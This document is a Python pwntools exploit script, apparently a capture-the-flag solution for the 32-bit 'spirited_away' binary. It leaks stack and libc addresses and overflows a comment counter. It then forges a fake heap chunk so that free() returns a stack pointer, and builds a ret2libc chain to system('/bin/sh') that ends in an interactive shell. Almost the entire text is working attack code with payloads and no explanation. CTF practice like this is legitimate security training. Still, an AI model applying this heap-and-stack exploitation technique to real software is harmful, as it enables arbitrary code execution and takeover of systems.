from pwn import * import os import struct import random import time import sys import signal
salt = ''
def clear(signum=None, stack=None): print('Strip all debugging information') os.system('rm -f /tmp/gdb_symbols{}* /tmp/gdb_pid{}* /tmp/gdb_script{}*'.replace('{}', salt)) exit(0)
for sig in [signal.SIGINT, signal.SIGHUP, signal.SIGTERM]: signal.signal(sig, clear)
try: gdb_symbols = ''' '''
f = open('/tmp/gdb_symbols{}.c'.replace('{}', salt), 'w') f.write(gdb_symbols) f.close() except Exception as e: print(e)
context.arch = "i386"
execve_file = './spirited_away'
sh = process(execve_file)
elf = ELF(execve_file) libc = ELF('./libc-2.23.so')
try: gdbscript = ''' # b *0x80486F8 b *0x8048771 b free b malloc c '''
f = open('/tmp/gdb_pid{}'.replace('{}', salt), 'w') f.write(str(proc.pidof(sh)[0])) f.close()
f = open('/tmp/gdb_script{}'.replace('{}', salt), 'w') f.write(gdbscript) f.close() except Exception as e: print(e)
sh.sendafter('Please enter your name: ', 'aaaa')
sh.sendafter('Please enter your age: ', '1\n') sh.sendafter('Why did you came to see this movie? ', 'c' * 56) sh.sendafter('Please enter your comment: ', 'dddd')
sh.recvuntil('c' * 56) stack_addr = u32(sh.recvn(4)) log.success('stack_addr: ' + hex(stack_addr))
sh.recvn(4)
libc_addr = u32(sh.recvn(4)) - libc.symbols['fflush'] - 11 log.success('libc_addr: ' + hex(libc_addr))
sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
for i in range(9): sh.sendafter('Please enter your name: ', 'a\0') sh.sendafter('Please enter your age: ', '1\n') sh.sendafter('Why did you came to see this movie? ', 'c\0') sh.sendafter('Please enter your comment: ', 'd\0') sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
for i in range(90): sh.sendafter('Please enter your age: ', '1\n') sh.sendafter('Why did you came to see this movie? ', 'c\0') sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
sh.sendafter('Please enter your name: ', 'a\0') sh.sendafter('Please enter your age: ', '1\n') sh.sendafter('Why did you came to see this movie? ', 'g' * 8 + p32(0) + p32(0x41) + 'f' * 0x38 + p32(0) + p32(0x11)) sh.sendafter('Please enter your comment: ', 'e' * 72 + p32(0) + p32(0) + p32(1) + p32(stack_addr - 0x60)) sh.sendafter('Would you like to leave another comment? <y/n>: ', 'y')
layout1 = [ 0,
libc_addr + libc.symbols['system'], libc_addr + libc.symbols['exit'], libc_addr + libc.search('/bin/sh\0').next(), ]
sh.sendafter('Please enter your name: ', 'z' * 64 + flat(layout1)) sh.sendafter('Please enter your age: ', '1\n') sh.sendafter('Why did you came to see this movie? ', 'c\0') sh.sendafter('Please enter your comment: ', 'd\0') sh.sendafter('Would you like to leave another comment? <y/n>: ', 'n')
sh.interactive() clear()
|